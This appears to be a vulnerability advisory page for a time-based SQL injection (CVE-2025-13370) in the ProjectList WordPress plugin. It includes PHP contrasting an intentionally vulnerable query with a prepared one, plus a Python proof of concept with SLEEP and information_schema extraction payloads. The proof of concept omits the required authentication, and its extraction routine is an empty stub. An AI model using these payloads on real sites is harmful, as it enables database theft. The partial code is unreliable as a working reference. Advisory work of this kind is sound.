Security Vulnerability Report
CVE-2025-13370 CVSS 4.9 MEDIUM

Published: 2025-11-25 08:15:50
Last Modified: 2026-04-15 00:35:42

Description

The ProjectList plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 0.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
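The following PHP is an added illustration of the defect class the description names, not the ProjectList plugin's own code: the user-supplied 'id' interpolated directly into the query beside the prepared form that WordPress's $wpdb API provides. The table name, column name and function names are assumptions.

```php
<?php
// Added example; the table/column names and function names are assumptions,
// not taken from the ProjectList plugin.

// Vulnerable pattern (insufficient escaping, no query preparation): the raw
// POST value is concatenated into the SQL text, so anything appended to the
// number, e.g. a SLEEP() condition, is executed as part of the query.
function pl_get_project_vulnerable( $wpdb ) {
    $id  = $_POST['id'];
    $sql = "SELECT * FROM {$wpdb->prefix}projectlist WHERE id = $id";
    return $wpdb->get_row( $sql );
}

// Hardened form: coerce the identifier to a non-negative integer and bind it
// through $wpdb->prepare() with a %d placeholder, so the value can only ever
// be a number and cannot alter the structure of the statement.
function pl_get_project_safe( $wpdb ) {
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        return null; // missing or non-numeric id: refuse rather than query
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}projectlist WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}
```

absint() alone already discards a trailing injected clause ("1 AND SLEEP(5)" becomes 1), and prepare() guarantees the same for any future string-typed parameter on the same query.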

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ProjectList plugin <= 0.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

target_url = "http://target-wordpress-site/wp-content/plugins/projectlist/pages/pl-add.php"


# Time-based blind SQL injection PoC
def test_sqli(id_param):
    start_time = time.time()
    payload = f"{id_param} AND (SELECT 1 FROM (SELECT SLEEP(5))test)"
    data = {"id": payload}
    try:
        response = requests.post(target_url, data=data, timeout=10)
        elapsed = time.time() - start_time
        if elapsed >= 5:
            return True  # SQL injection confirmed
    except requests.exceptions.Timeout:
        return True
    except requests.exceptions.RequestException:
        return False  # target unreachable
    return False


# Test for vulnerability
if test_sqli("1"):
    print("[+] CVE-2025-13370 vulnerability confirmed!")
    print("[+] ProjectList plugin is vulnerable to time-based SQL injection")
else:
    print("[-] Target may not be vulnerable or unreachable")


# Example: Extract database version using blind injection
def extract_db_version():
    charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz@_."
    result = ""
    for pos in range(1, 50):
        for char in charset:
            payload = (
                f"1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT MID(version(),{pos},1) "
                f"FROM dual),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"
            )
            # Implementation would require blind timing analysis
            pass
    return result
```

References

https://it.wordpress.org/plugins/projectlist/
https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L61
https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L61
https://www.wordfence.com/threat-intel/vulnerabilities/id/e424d27b-f719-4fbf-b4eb-83b42130666c?source=cve

Weakness: CWE-89
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13370",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-25T08:15:49.667",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The ProjectList plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 0.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://it.wordpress.org/plugins/projectlist/",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L61",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L61",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e424d27b-f719-4fbf-b4eb-83b42130666c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```